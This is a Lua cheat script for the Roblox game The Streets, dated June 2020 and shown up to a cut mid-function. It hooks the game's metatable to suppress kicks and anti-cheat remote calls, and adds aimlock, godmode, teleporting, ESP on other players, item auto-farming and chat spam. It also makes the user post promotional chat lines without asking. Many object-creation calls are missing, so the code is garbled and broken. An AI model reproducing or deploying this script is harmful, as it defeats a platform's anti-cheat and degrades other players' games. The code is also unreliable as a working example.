

Jun 2nd, 2020
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  1. if pcall(readfile,"CyrusStreetsAdminSettings") then
  2. writefile("CyrusStreetsAdminSettings.json",readfile("CyrusStreetsAdminSettings"))
  3. if delfile then
  4. delfile("CyrusStreetsAdminSettings")
  5. end
  6. end
  7. local Tick = tick()
  8. getgenv().Players = game:GetService'Players'
  9. getgenv().TeleportService = game:GetService'TeleportService'
  10. getgenv().ReplicatedStorage = game:GetService'ReplicatedStorage'
  11. getgenv().StarterGui = game:GetService'StarterGui'
  12. getgenv().TweenService = game:GetService'TweenService'
  13. getgenv().UserInput = game:GetService'UserInputService'
  14. getgenv().RunService = game:GetService'RunService'
  15. getgenv().Lighting = game:GetService'Lighting'
  16. getgenv().CoreGui = game:GetService'CoreGui'
  17. getgenv().HttpService = game:GetService'HttpService'
  18. getgenv().MarketplaceService = game:GetService'MarketplaceService'
  19. getgenv().LP = Players.LocalPlayer or Players.PlayerAdded:Wait()
  20. getgenv().Mouse = LP:GetMouse()
  21. getgenv().GetChar = function() return LP.Character or LP.CharacterAdded:Wait() end
  22. GetChar():WaitForChild('Humanoid',10) -- allows auto-execution
  23. local PlayerTable,Commands,KeyTable,UrlEncoder,AdminUsers,DontStompWhitelisted = {},{},{['w'] = false;['a'] = false;['s'] = false;['d'] = false;['Shift'] = false;['Control'] = false;},{['0'] = "%30";['1'] = "%31";['2'] = "%32";['3'] = "%33"; ['4'] = "%34";['5'] = "%35";['6'] = "%36";['7'] = "%37";['8'] = "%38";['9'] = "%39";[' '] = "%20";},{},{}
  24. local NormalWS,NormalJP,NormalHH = GetChar().Humanoid.WalkSpeed,GetChar().Humanoid.JumpPower,GetChar().Humanoid.HipHeight
  25. local AimLock,GodMode,AutoDie,AliasesEnabled,Noclipping,AutoFarm,ItemEsp,WalkShoot,flying,AutoStomp,Freecam,CamLocking,FeLoop,TpBypass,HealBot = false,false,false,true,false,false,false,false,false,false,false,false,false,false,false
  26. local BlinkSpeed,SpawnWS,SpawnJP,SpawnHH,ClockTime,PlayOnDeath,AimlockTarget,CamlockPlayer,LoopPlayer
  27. local AirWalk ='Part'
  28. local Cframe ="Frame",CoreGui.RobloxGui)
  29. local CText,CmdFrame,MainFrame,DmgIndicator ="TextBox",Cframe),"Frame",Cframe),'Frame',CoreGui.RobloxGui),'TextLabel',LP.PlayerGui.Chat.Frame)
  30. local ScrollingFrame,SearchBar,Credits ='ScrollingFrame',MainFrame),'TextBox',MainFrame),'TextLabel',MainFrame)
  31. local BulletColour,ItemEspColour,EspColour =,0,0)),Color3.fromRGB(200,200,200),Color3.fromRGB(200,200,200)
  32. local UseDraw,DrawingT = pcall(assert,Drawing,'test')
  33. local ShiftSpeed,ControlSpeed,WalkSpeed,HealBotHealth,BlinkSpeed,AimbotVelocity = 25,8,16,25,1,5
  34. local OldFov = workspace.CurrentCamera.FieldOfView
  35. local Config = "CyrusStreetsAdminSettings"
  36. local TargetPart,AimlockMode = "Prediction","LeftClick"
  37. Players:Chat("Cyrus is my god")
  38. Players:Chat("Hey I'm a cyrus' streets admin user1")
  39. local RobloxInForeground = true
  40. local DrawTable = {
  41. ['LineColour'] = Color3.fromRGB(0,144,0);
  42. ['Thickness'] = 1;
  43. ['Transparency'] = 1;
  44. ['Visible'] = true;
  45. }
  47. if UseDraw then
  48. DrawingT ='Text'
  49. DrawingT.Visible = true
  50. DrawingT.Center = true
  51. DrawingT.Size = 15
  52. DrawingT.Position = / 2) - 450, (workspace.CurrentCamera.ViewportSize.Y - 125))
  53. DrawingT.Color = Color3.fromRGB(255,255,255)
  54. DrawingT.Text = "Current WalkSpeed: "..GetChar().Humanoid.WalkSpeed.."\nSprinting Speed: "..ShiftSpeed.."\nCrouching Speed: "..ControlSpeed.."\nJumpPower: "..GetChar().Humanoid.JumpPower.."\nFlying: "..tostring(flying).."\nNoclipping: "..tostring(Noclipping).."\nAimlock Target: "..tostring(AimlockTarget)
  55. end
  57. if game.PlaceId == 455366377 then
  58. PartTable = {
  59. ['Burger'] = workspace:WaitForChild'Burger | $15';
  60. ['Drink'] = workspace:WaitForChild'Drink | $15';
  61. ['Ammo'] = workspace:WaitForChild'Buy Ammo | $25';
  62. ['Pipe'] = workspace:WaitForChild'Pipe | $100';
  63. ['Machete'] = workspace:WaitForChild'Machete | $70';
  64. ['SawedOff'] = workspace:WaitForChild'Sawed Off | $150';
  65. ['Spray'] = workspace:WaitForChild'Spray | $20';
  66. ['Uzi'] = workspace:WaitForChild'Uzi | $150';
  67. ['Glock'] = workspace:WaitForChild'Glock | $200';
  68. }
  69. end
  71. if workspace:FindFirstChild'Armoured Truck' then
  72. local Part ="Part", workspace)
  73. Part.Name,Part.Color,Part.CFrame,Part.Size,Part.Material,Part.Anchored = "TP Region",Color3.fromRGB(196,40,28),,0,-523.700012),,1,20.31),"ForceField",true
  74. workspace:FindFirstChild'Armoured Truck':Destroy()
  75. elseif workspace:FindFirstChild'TPer' then
  76. local Part ="Part", workspace)
  77. Part.Name,Part.Color,Part.CFrame,Part.Size,Part.Material,Part.Anchored = "TP Region",Color3.fromRGB(196,40,28),,-0.2,221),,1,6),"ForceField",true
  78. workspace:FindFirstChild'TPer':Destroy()
  79. end
  81. LP.PlayerGui.Chat.Frame.ChatChannelParentFrame.Visible = true
  82. LP.PlayerGui.Chat.Frame.ChatBarParentFrame.Position = LP.PlayerGui.Chat.Frame.ChatChannelParentFrame.Position +,LP.PlayerGui.Chat.Frame.ChatChannelParentFrame.Size.Y)
  83. --^ Ty to Jayy#0648 for this "Hack" for bringing back normal chat
  85. local SettingsTable = {
  86. Keys = {};
  87. ClickTpKey = "";
  88. ShiftSpeed = 25;
  89. ControlSpeed = 8;
  90. TargetPart = "Prediction";
  91. AimlockMode = "LeftClick";
  92. BlinkMode = "Shift";
  93. AimbotVelocity = 10;
  94. }
  96. -- Hotkey start
  98. local function savesettings()
  99. writefile(Config..".json",HttpService:JSONEncode(SettingsTable))
  100. local SettingsToSave = HttpService:JSONDecode(readfile(Config..".json"))
  101. Keys = SettingsToSave.Keys;
  102. ClickTpKey = SettingsToSave.ClickTpKey;
  103. ShiftSpeed = SettingsToSave.ShiftSpeed;
  104. ControlSpeed = SettingsToSave.ControlSpeed;
  105. TargetPart = SettingsToSave.TargetPart;
  106. AimlockMode = SettingsToSave.AimlockMode;
  107. BlinkMode = SettingsToSave.BlinkMode;
  108. AimbotVelocity = SettingsToSave.AimbotVelocity;
  109. end
  111. getgenv().updateSettings = function()
  112. local New = {
  113. Keys = Keys;
  114. ClickTpKey = ClickTpKey;
  115. ShiftSpeed = ShiftSpeed;
  116. ControlSpeed = ControlSpeed;
  117. TargetPart = TargetPart;
  118. AimlockMode = AimlockMode;
  119. BlinkMode = BlinkMode;
  120. AimbotVelocity = AimbotVelocity;
  121. }
  122. writefile(Config..".json",HttpService:JSONEncode(New))
  123. end
  125. local function runsettings()
  126. local SettingsToRun = HttpService:JSONDecode(readfile(Config..".json"))
  127. Keys = SettingsToRun.Keys
  128. ClickTpKey = SettingsToRun.ClickTpKey
  129. BlinkMode = SettingsToRun.BlinkMode
  130. if SettingsToRun.AimlockMode then
  131. AimlockMode = SettingsToRun.AimlockMode
  132. end
  133. if SettingsToRun.TargetPart then
  134. TargetPart = SettingsToRun.TargetPart
  135. end
  136. if SettingsToRun.ShiftSpeed and SettingsToRun.ControlSpeed then
  137. ShiftSpeed = SettingsToRun.ShiftSpeed;
  138. ControlSpeed = SettingsToRun.ControlSpeed;
  139. end
  140. if SettingsToRun.AimbotVelocity then
  141. AimbotVelocity = SettingsToRun.AimbotVelocity
  142. end
  143. end
  145. if readfile and writefile then
  146. local Work,Error = pcall(readfile,Config..".json")
  147. if not Work then
  148. local Work,Error = pcall(savesettings)
  149. if not Work then
  150. print'Error with saving settings'
  151. end
  152. else
  153. local Work,Error = pcall(runsettings)
  154. if not Work then
  155. print'Error with running settings'
  156. end
  157. end
  158. end
  160. -- Hotkey end
  162. -- Bypass Start
  164. local gamememe = getrawmetatable(game)
  165. local Closure,Caller = newcclosure,checkcaller or is_protosmasher_caller or Cer.isCerus
  166. local writeable = setreadonly or make_writeable
  167. local callingscript = getcallingscript or get_calling_script
  168. local name,index,nindex = gamememe.__namecall,gamememe.__index,gamememe.__newindex
  169. writeable(gamememe,false)
  171. gamememe.__index = Closure(function(self,Index)
  172. if TpBypass and callingscript and callingscript() ~= script and Index == "HumanoidRootPart" then -- was requested to add this
  173. return index(self,"Torso")
  174. end
  175. return index(self,Index)
  176. end)
  178. gamememe.__newindex = Closure(function(self,Property,b)
  179. if Caller() then return nindex(self,Property,b) end
  180. if self:IsA'Humanoid' then
  181. game:GetService'StarterGui':SetCore('ResetButtonCallback',true)
  182. if Property == "WalkSpeed" then
  183. if WalkShoot then
  184. return
  185. end
  186. end
  187. if Property == "Health" or Property == "JumpPower" or Property == "HipHeight" then
  188. return
  189. end
  190. end
  191. if Property == "CFrame" and self:IsDescendantOf(LP.Character) then
  192. return
  193. end
  194. return nindex(self,Property,b)
  195. end)
  197. gamememe.__namecall = Closure(function(self,...)
  198. local Arguments = {...}
  199. if Caller() then
  200. if getnamecallmethod() == "FindFirstChild" then
  201. if Arguments[1] == "RealHumanoidRootPart" then
  202. Arguments[1] = "HumanoidRootPart"
  203. return name(self,unpack(Arguments))
  204. end
  205. end
  206. return name(self,...)
  207. end
  208. if getnamecallmethod() == "Destroy" and tostring(self) == "BodyGyro" or getnamecallmethod() == "Destroy" and tostring(self) == "BodyVelocity" then
  209. return invalidfunctiongang(self,...)
  210. end
  211. if getnamecallmethod() == "BreakJoints" and self.Name == LP.Character.Name then
  212. return invalidfunctiongang(self,...)
  213. end
  214. if getnamecallmethod() == "Kick" or getnamecallmethod() == "Destroy" and tostring(self) == tostring(LP) then
  215. return
  216. end
  217. if getnamecallmethod() == "WaitForChild" or getnamecallmethod() == "FindFirstChild" then
  218. if callingscript and callingscript() ~= script and TpBypass and Arguments[1] == "HumanoidRootPart" then
  219. Arguments[1] = "Torso"
  220. return name(self,unpack(Arguments))
  221. end
  222. end
  223. if getnamecallmethod() == "FireServer" then
  224. if self.Name == "lIII" or tostring(self.Parent) == "ReplicatedStorage" then
  225. return wait(9e9)
  226. end
  227. if Arguments[1] == "hey" then
  228. return wait(9e9)
  229. end
  230. if Arguments[1] == "play" then
  231. local TempTable = {}
  232. tostring(Arguments[2]):gsub('.',function(Char)
  233. if UrlEncoder[Char] then
  234. table.insert(TempTable,UrlEncoder[Char])
  235. else
  236. table.insert(TempTable,Char)
  237. end
  238. end)
  239. Arguments[2] = table.concat(TempTable,"")
  240. PlayOnDeath = Arguments[2]
  241. return name(self,unpack(Arguments))
  242. end
  243. if Arguments[1] == "stop" then
  244. PlayOnDeath = nil
  245. end
  246. end
  247. if LP.Character.FindFirstChildOfClass(LP.Character,"Tool") and typeof(Arguments[1]) == "CFrame" then
  248. if AimlockTarget and AimLock then
  249. if TargetPart == "Prediction" then
  250. if AimlockTarget.FindFirstChild(AimlockTarget,"HumanoidRootPart") then
  251. return name(self,AimlockTarget.Head.CFrame + AimlockTarget.HumanoidRootPart.Velocity / AimbotVelocity)
  252. else
  253. return name(self,AimlockTarget.Head.CFrame + AimlockTarget.Torso.Velocity / AimbotVelocity)
  254. end
  255. else
  256. if AimlockTarget.FindFirstChild(AimlockTarget,TargetPart) then
  257. return name(self,AimlockTarget[TargetPart].CFrame)
  258. else
  259. notif(tostring(AimlockTarget).." doesn't have that part in their character.","I recommend switching to something else.",5,nil)
  260. end
  261. end
  262. end
  263. end
  264. return name(self,...)
  265. end)
  267. writeable(gamememe,true)
  268. -- Bypass End
  270. getgenv().notif = function(title,message,length,icon)
  271. StarterGui:SetCore("SendNotification",{['Title'] = title;['Text'] = message;['Duration'] = length;['Icon'] = icon;})
  272. end
  274. getgenv().Teleport = function(Part)
  275. if not typeof(Part) == "CFrame" then return end
  276. local PartFound = GetChar():FindFirstChild'HumanoidRootPart' or GetChar():FindFirstChild'Torso'
  277. if not GetChar():FindFirstChild'HumanoidRootPart' then
  278. PartFound.CFrame = Part
  279. else
  280. local Play = TweenService:Create(PartFound,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut),{CFrame = Part})
  281. Play:play()
  282. end
  283. end
  285. local function hasItem(Player,Item)
  286. if type(Item) == "boolean" then
  287. local Tool = Player.Character:FindFirstChildOfClass'Tool'
  288. if Tool then
  289. return Tool.Name
  290. else
  291. return 'none'
  292. end
  293. end
  294. if Player.Backpack:FindFirstChild(Item) or Player.Character:FindFirstChild(Item) then
  295. return 'yes'
  296. else
  297. return 'no'
  298. end
  299. end
  301. local function checkHp(Plr)
  302. return Plr:FindFirstChildOfClass'Humanoid' and math.floor(Plr.Humanoid.Health) or "No Humanoid"
  303. end
  305. local function LegacyEsp(Player)
  306. if not Player.Character or not Player.Character:FindFirstChild'Head' then return end
  307. local Esp1 ="BillboardGui",Player.Character)
  308. local Text ="TextLabel",Esp1)
  309. Esp1.Adornee = Player.Character.Head
  310. Esp1.Name = "[ESP]"..Player.Name
  311. Esp1.Size =,100,0,100)
  312. Esp1.StudsOffset =,1,0)
  313. Esp1.AlwaysOnTop = true
  314. Text.BackgroundTransparency = 1
  315. Text.Position =,0,0,0)
  316. Text.Size =,0,0,40)
  317. Text.TextStrokeTransparency = 0.5
  318. Text.TextSize = 15
  319. local PCChild = Player.Character:GetChildren()
  320. RunService.Stepped:Connect(function()
  321. if Player and Player.Character and Player.Character:FindFirstChild'Head' and GetChar():FindFirstChild'Head' then
  322. Text.Text = Player.Name.." Position: "..math.floor((GetChar().Head.Position - Player.Character.Head.Position).magnitude)
  323. Text.TextStrokeColor3 = EspColour
  324. Text.TextColor3 = EspColour
  325. end
  326. end)
  327. return Esp1
  328. end
  330. local EspTable = {}
  331. local function espPlayer(Player,Method,IsUser)
  332. if not Player.Character or not Player.Character:FindFirstChild'Head' then return end
  333. if not IsUser then IsUser = "false" else IsUser = "true" end
  334. if table.find(AdminUsers,Player.UserId) then IsUser = "true" end
  335. if not UseDraw or Method == "Legacy" then
  336. local Esp1 = LegacyEsp(Player)
  337. local CAdded;
  338. CAdded = Player.CharacterAdded:Connect(function(C)
  339. if table.find(EspTable,Player.UserId) then
  340. C:WaitForChild('Head',10)
  341. Esp1 = LegacyEsp(Player)
  342. else
  343. CAdded:Disconnect()
  344. end
  345. end)
  346. else
  347. local TopLeft,TopRight,BottomLeft,BottomRight ='Line','Line','Line','Line'
  348. local Text ='Text'
  349. TopLeft.Color = Color3.fromRGB(144,0,0)
  350. TopRight.Color = Color3.fromRGB(144,0,0)
  351. BottomLeft.Color = Color3.fromRGB(144,0,0)
  352. BottomRight.Color = Color3.fromRGB(144,0,0)
  353. local Tracer ='Line'
  354. PlayerTable[#PlayerTable + 1] = {Player,TopLeft,TopRight,BottomLeft,BottomRight,Text,Tracer,IsUser}
  355. end
  356. end
  358. local function Unesp(P)
  359. for i = 1,#PlayerTable do
  360. if PlayerTable[i] and PlayerTable[i][1] == P then
  361. PlayerTable[i][2]:Remove()
  362. PlayerTable[i][3]:Remove()
  363. PlayerTable[i][4]:Remove()
  364. PlayerTable[i][5]:Remove()
  365. PlayerTable[i][6]:Remove()
  366. PlayerTable[i][7]:Remove()
  367. PlayerTable[i][8] = nil
  368. table.remove(PlayerTable,i)
  369. end
  370. end
  371. end
  373. local function GrabThing(Thing,OldPos)
  374. if not PartTable then
  375. notif("Can't tp to "..Thing,"as you are not playing normal streets!",5,"rbxassetid://1281284684") return
  376. end
  377. local PartFound = GetChar():FindFirstChild'HumanoidRootPart' or GetChar():FindFirstChild'Torso'
  378. local Anim ='Animation'
  379. Anim.AnimationId = "rbxassetid://188632011"
  380. local Track = GetChar().Humanoid:LoadAnimation(Anim)
  381. PartFound.CFrame = PartFound.CFrame *,45),0,math.random(1,5))
  382. wait()
  383. repeat
  384. Track:play(.1,1,1)
  385. PartFound.CFrame = PartTable[Thing]:FindFirstChildOfClass'Part'.CFrame +,0.5,0)
  386. RunService.Heartbeat:wait()
  387. until PartTable[Thing]:FindFirstChildOfClass'Part'.BrickColor =='Bright red' or GetChar():FindFirstChild'KO' or GetChar().Humanoid.Health == 0
  388. PartFound.CFrame = OldPos
  389. return true
  390. end
  392. local function Button1Down()
  393. local MTarget = Mouse.Target
  394. if GetChar():FindFirstChild'Zetox Btools' then
  395. Mouse.Target:Destroy()
  396. end
  397. if MTarget and MTarget.Parent then
  398. local NTarget = MTarget.Parent
  399. if not Players:GetPlayerFromCharacter(NTarget) then NTarget = NTarget.Parent end
  400. if not Players:GetPlayerFromCharacter(NTarget) then return end
  401. if NTarget ~= LP.Character and NTarget ~= AimlockTarget and AimLock and AimlockMode == "LeftClick" then
  402. AimlockTarget = NTarget
  403. local Connection;
  404. Connection = Players:GetPlayerFromCharacter(NTarget).CharacterAdded:Connect(function(C)
  405. if tostring(AimlockTarget) == tostring(C) then
  406. AimlockTarget = C
  407. else
  408. Connection:Disconnect()
  409. end
  410. end)
  411. notif("AimlockTarget has been set to",AimlockTarget.Name,5,nil)
  412. end
  413. end
  414. end
  416. local function BehindAWall(Target)
  417. local RYEBread =,Target.Head.Position - workspace.CurrentCamera.CoordinateFrame.Position)
  418. local RYEBreadHit = workspace:FindPartOnRay(RYEBread)
  419. if RYEBreadHit then
  420. if RYEBreadHit:IsDescendantOf(Target) then
  421. return false
  422. else
  423. return true
  424. end
  425. end
  426. end
  428. local function closestToMouse()
  429. local ClosestPos,ClosestPlayer = math.huge,nil
  430. for i,v in pairs(Players:GetPlayers()) do
  431. if v.Character and v.Character:FindFirstChild'Head' and v ~= LP then
  432. local Dist = (v.Character.Head.Position - workspace.CurrentCamera.CoordinateFrame.Position).magnitude
  433. local RYETarget =,(Mouse.Hit.p - workspace.CurrentCamera.CoordinateFrame.Position)).unit
  434. local RYEHit,RYEPos = workspace:FindPartOnRay(RYETarget,workspace)
  435. local NewPos = math.floor((RYEPos - v.Character.Head.Position).magnitude)
  436. if NewPos < 500 and NewPos < ClosestPos and not BehindAWall(v.Character) then
  437. ClosestPos = NewPos
  438. ClosestPlayer = v
  439. end
  440. end
  441. end
  442. return ClosestPlayer
  443. end
  445. local function Button2Down()
  446. if Mouse.Target then
  447. local Target = Mouse.Target.Parent
  448. if Target:FindFirstChild'Lock' and Target:FindFirstChild'Click' and Target:FindFirstChild'Locker' then
  449. if Target.Locker.Value then
  450. Target.Lock.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  451. Target.Click.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  452. else
  453. Target.Click.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  454. Target.Lock.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  455. end
  456. end
  457. end
  458. if AimLock and AimlockMode == "RightClick" and KeyTable['Shift'] then
  459. AimlockTarget = closestToMouse().Character
  460. local Connection;
  461. Connection = Players:GetPlayerFromCharacter(AimlockTarget).CharacterAdded:Connect(function(C)
  462. if tostring(AimlockTarget) == tostring(C) then
  463. AimlockTarget = C
  464. else
  465. Connection:Disconnect()
  466. end
  467. end)
  468. notif("AimlockTarget","has been set to"..AimlockTarget.Name,5,nil)
  469. end
  470. end
  472. local function FreeCam(Speed)
  473. if not GetChar():FindFirstChild'Head' then return end
  474. if workspace:FindFirstChild'FreecamPart' then
  475. workspace.FreecamPart:Destroy()
  476. end
  477. Speed = Speed or 35
  478. GetChar().Head.Anchored = true
  479. local FreecamPart ='Part',workspace)
  480. FreecamPart.Name = "FreecamPart"
  481. FreecamPart.Position = GetChar().Head.Position +,5,0)
  482. FreecamPart.Transparency = 1
  483. FreecamPart.CanCollide = false
  484. FreecamPart.Anchored = true
  485. workspace.CurrentCamera.CameraSubject = FreecamPart
  486. repeat wait()
  487. local Pos =
  488. local Look = (workspace.CurrentCamera.Focus.p - workspace.CurrentCamera.CoordinateFrame.p).unit
  489. local PartPos = FreecamPart.Position
  490. if KeyTable['w'] then
  491. Pos = Pos +,0,-1)
  492. elseif KeyTable['a'] then
  493. Pos = Pos +,0,0)
  494. elseif KeyTable['s'] then
  495. Pos = Pos +,0,1)
  496. elseif KeyTable['d'] then
  497. Pos = Pos +,0,0)
  498. elseif KeyTable['Space'] then
  499. Pos = Pos +,1,0)
  500. elseif KeyTable['Control'] then
  501. Pos = Pos +,-1,0)
  502. end
  503. FreecamPart.CFrame =,PartPos + Look) * * Speed)
  504. until not Freecam or GetChar().Humanoid.Health == 0
  505. workspace.CurrentCamera.CameraSubject = GetChar()
  506. GetChar().Head.Anchored = false
  507. if workspace:FindFirstChild'FreecamPart' then
  508. workspace.FreecamPart:Destroy()
  509. end
  510. end
  512. local function b(Text)
  513. DmgIndicator.Visible = true
  514. DmgIndicator.Text = Text
  515. wait(5)
  516. DmgIndicator.Text = ""
  517. DmgIndicator.Visible = false
  518. end
  520. local function Char(Plr)
  521. local Tool = Plr:FindFirstChildOfClass'Tool'
  522. if Tool:FindFirstChild'Fire' then
  523. return 'shot you',Tool
  524. else
  525. return 'hit you',Tool
  526. end
  527. end
  529. getgenv().AddCommand = function(CommandF,Name,Alias,Help)
  530. Commands[#Commands + 1] = {['Function'] = CommandF,['Name'] = Name,['Alias'] = Alias,['Help'] = Help}
  531. end
  532. getgenv().FindCommand = function(Command)
  533. for i = 1,#Commands do
  534. if Commands[i].Name:lower() == Command or AliasesEnabled and table.find(Commands[i].Alias,Command) then
  535. return Help and Commands[i].Name.." "..Commands[i].Help or Commands[i].Function
  536. end
  537. end
  538. end
  540. getgenv().CheckCommand = function(Chat)
  541. local Arguments = string.split(Chat," ")
  542. local NCommand = FindCommand(table.remove(Arguments,1):lower())
  543. if NCommand then
  544. local Work,Error = pcall(NCommand,Arguments)
  545. if not Work then
  546. wait(0.5)
  547. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("There was an error with this command, I have set it to your clipboard. Send it to Cy (with the command you used) and it should be fixed next update.","All")
  548. if setclipboard then
  549. setclipboard(Error)
  550. else
  551. print(Error)
  552. end
  553. end
  554. end
  555. end
  557. getgenv().PlrFinder = function(Plr)
  558. local NewPlr,Player = Plr:lower(),Players:GetPlayers()
  559. if #NewPlr == 2 and NewPlr == "me" then return LP end
  560. if NewPlr == "all" then return Player end
  561. for i = 1,#Player do
  562. if Player[i].Name:lower():sub(1,#NewPlr) == NewPlr then
  563. return Player[i]
  564. end
  565. end
  566. end
  568. local JustDoubleJumped = false
  569. local function HumanoidState(Old,New)
  570. if New == Enum.HumanoidStateType.Landed and JustDoubleJumped then
  571. local Anim ='Animation'
  572. Anim.AnimationId = "rbxassetid://129423030"
  573. local AnimTrack = GetChar().Humanoid:LoadAnimation(Anim)
  574. wait(0.3)
  575. AnimTrack:play()
  576. JustDoubleJumped = false
  577. elseif New == Enum.HumanoidStateType.FallingDown or New == Enum.HumanoidStateType.PlatformStanding and NoGh or flying then
  578. GetChar().Humanoid.PlatformStand = false
  579. GetChar().Humanoid:ChangeState(8)
  580. end
  581. end
  583. local function DoubleJump()
  584. if GetChar() and GetChar().Humanoid and DoubleJumpEnabled then
  585. GetChar().Humanoid:ChangeState(3)
  586. local Anim ='Animation'
  587. Anim.AnimationId = "rbxassetid://229782914"
  588. local AnimTrack = GetChar().Humanoid:LoadAnimation(Anim)
  589. AnimTrack:play(.1,1,1.5)
  590. JustDoubleJumped = true
  591. end
  592. end
  594. getgenv().find = function(Item)
  595. for i,v in pairs(workspace:GetChildren()) do
  596. if v.Name == "RandomSpawner" and v:FindFirstChild'Model' then
  597. local Handle = v.Model.Handle
  598. if Item == "Cash" and Handle:FindFirstChildOfClass'MeshPart' and string.find(Handle:FindFirstChildOfClass'MeshPart'.MeshId,"511726060") then
  599. return v
  600. elseif Item == "Shotty" and Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"142383762") then
  601. return v
  602. elseif Item == "Sawed Off" and Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"219397110") then
  603. return v
  604. elseif Item == "Uzi" and Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"328964620") then
  605. return v
  606. elseif Item == "All" then
  607. return v
  608. end
  609. end
  610. end
  611. end
  613. local function uselessfunction(Thing)
  614. local Model = Thing:WaitForChild('Model',10)
  615. if Model then
  616. local Handle = Thing.Model.Handle
  617. if Handle:FindFirstChildOfClass'MeshPart' and string.find(Handle:FindFirstChildOfClass'MeshPart'.MeshId,"511726060") then
  618. return "Cash"
  619. elseif Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"142383762") then
  620. return "Shotty"
  621. elseif Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"219397110") then
  622. return "Sawed Off"
  623. elseif Handle:FindFirstChild'Fire' and string.find(Handle.Fire.SoundId,"328964620") then
  624. return "Uzi"
  625. elseif Handle:FindFirstChild'Blade' and string.find(Handle.Blade.TextureID,"12177251") then
  626. return "Katana"
  627. end
  628. end
  629. end
  631. local function addBillBoardGui(Item)
  632. local Itemx = uselessfunction(Item)
  633. if not Itemx then return end
  634. local Esp1 ="BillboardGui",Item)
  635. local Text ="TextLabel",Esp1)
  636. Esp1.Adornee = Item
  637. Esp1.Size =,100,0,100)
  638. Esp1.StudsOffset =,1,0)
  639. Esp1.AlwaysOnTop = true
  640. Text.BackgroundTransparency = 1
  641. Text.Position =,0,0,0)
  642. Text.Size =,0,0,40)
  643. Text.TextColor3 = ItemEspColour
  644. Text.TextStrokeTransparency = 0.5
  645. Text.TextSize = 15
  646. Text.TextStrokeColor3 = ItemEspColour
  647. Text.Text = Itemx
  648. end
  650. workspace.ChildAdded:Connect(function(Part)
  651. if Part.Name == "RandomSpawner" then
  652. if AutoFarm then
  653. farm("Cash")
  654. end
  655. if ItemEsp then
  656. addBillBoardGui(Part)
  657. end
  658. end
  659. end)
  662. getgenv().farm = function(Item)
  663. for i,v in pairs(workspace:GetChildren()) do
  664. if v.Name == "RandomSpawner" then
  665. if find(Item) and type(find(Item)) == "userdata" then
  666. Teleport(find(Item).CFrame)
  667. wait(3)
  668. else
  669. notif("Farm "..Item,"None of "..Item.." on the map",5,"rbxassetid://1281284684")
  670. break;
  671. end
  672. end
  673. end
  674. end
  676. AddCommand(function()
  677. AliasesEnabled = not AliasesEnabled
  678. notif("AliasesEnabled","Has been set to "..tostring(AliasesEnabled),5,nil)
  679. end,"usealias",{},"Turns on / off Aliases")
  681. AddCommand(function(Arguments)
  682. if not Arguments[1] then
  683. MainFrame.Visible = not MainFrame.Visible
  684. end
  685. end,"help",{"commands","cmds"},"Gives you the commands help info")
  687. AddCommand(function()
  688. local Btool ='Tool',LP.Backpack)
  689. Btool.Name = "Zetox Btools"
  690. end,"btools",{},"Gives you Btools")
  692. AddCommand(function()
  693. local Children = LP.PlayerGui.HUD:GetChildren()
  694. for i = 1,#Children do
  695. if Children[i]:IsA'Frame' then
  696. Children[i].Active = not Children[i].Active
  697. Children[i].Draggable = not Children[i].Draggable
  698. end
  699. end
  700. end,"draggablegui",{},"Makes the HP/KO/Stamina bar draggable")
  702. AddCommand(function()
  703. NoGh = not NoGh
  704. notif("Nogh","Has been set to "..tostring(NoGh),5,nil)
  705. end,"nogroundhit",{"nogh","antigh","antigroundhit"},"Makes it so you can't be ground hit")
  707. AddCommand(function(Arguments)
  708. if not Arguments[1] then
  709. GodMode = not GodMode
  710. GetChar():BreakJoints()
  711. end
  712. end,"godmode",{"god"},"Gods your player (Breaks tools)")
  714. AddCommand(function(Arguments)
  715. local Tool = GetChar():FindFirstChildOfClass'Tool'
  716. if Tool then
  717. Tool.Parent = LP.Backpack
  718. Tool.Grip =[1] or 0,Arguments[2] or 0,Arguments[3] or 0) +[4] or 0,Arguments[5] or 0,Arguments[6] or 0)
  719. Tool.Parent = GetChar()
  720. else
  721. notif("NO TOOLS","ONE TOOL IS NEEDED",5,nil)
  722. end
  723. end,"grippos",{"grip"},"[1 2 3 4 5 6] - changes grip pos to the arguments you set (First 3 are CFrame,last 3 are Vector)")
  725. AddCommand(function(Arguments)
  726. local GDesc = game:GetDescendants()
  727. for i = 1,Arguments[1] or 50 do
  728. for i = 1,#GDesc do
  729. if GDesc[i]:IsA'Tool' and GDesc[i]:FindFirstChild'Click' then
  730. GDesc[i].Click:FireServer()
  731. wait()
  732. end
  733. end
  734. end
  735. end,"spamclick",{},"spams the Click remote and makes annoying sounds")
  737. AddCommand(function()
  738. local WChild = workspace:GetChildren()
  739. for i = 1,#WChild do
  740. if WChild[i].Name == "Door" and WChild[i]:FindFirstChild'Click' and WChild[i]:FindFirstChild'Lock' then
  741. WChild[i].Lock.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  742. WChild[i].Click.ClickDetector:FindFirstChildOfClass'RemoteEvent':FireServer()
  743. wait()
  744. end
  745. end
  746. end,"doors",{},"locks/unlocks doors")
  748. local SpamDelay,SpamMessage,Spamming = 1,"Cyrus' Admin Or No Admin",false
  749. AddCommand(function(Arguments)
  750. if Arguments[1] then
  751. SpamMessage = table.concat(Arguments," ")
  752. end
  753. Spamming = not Spamming
  754. end,"spam",{},"Spams a message you set")
  756. AddCommand(function(Arguments)
  757. SpamDelay = Arguments[1] or 1
  758. end,"spamdelay",{},"Delays the spam for [amount] Default: 1 second")
  760. AddCommand(function()
  761. local GDesc = game:GetDescendants()
  762. for i = 1,10 do
  763. for i = 1,#GDesc do
  764. if GDesc[i]:IsA'Tool' and GDesc[i]:FindFirstChild'Click' then
  765. GDesc[i].Click:FireServer()
  766. end
  767. end
  768. end
  769. end,"muteallradios",{"muteradios"},"Mutes all radios (does not loop)")
  771. AddCommand(function(Arguments)
  772. if Arguments[1] then
  773. Normalwalk = true
  774. WalkShoot = true
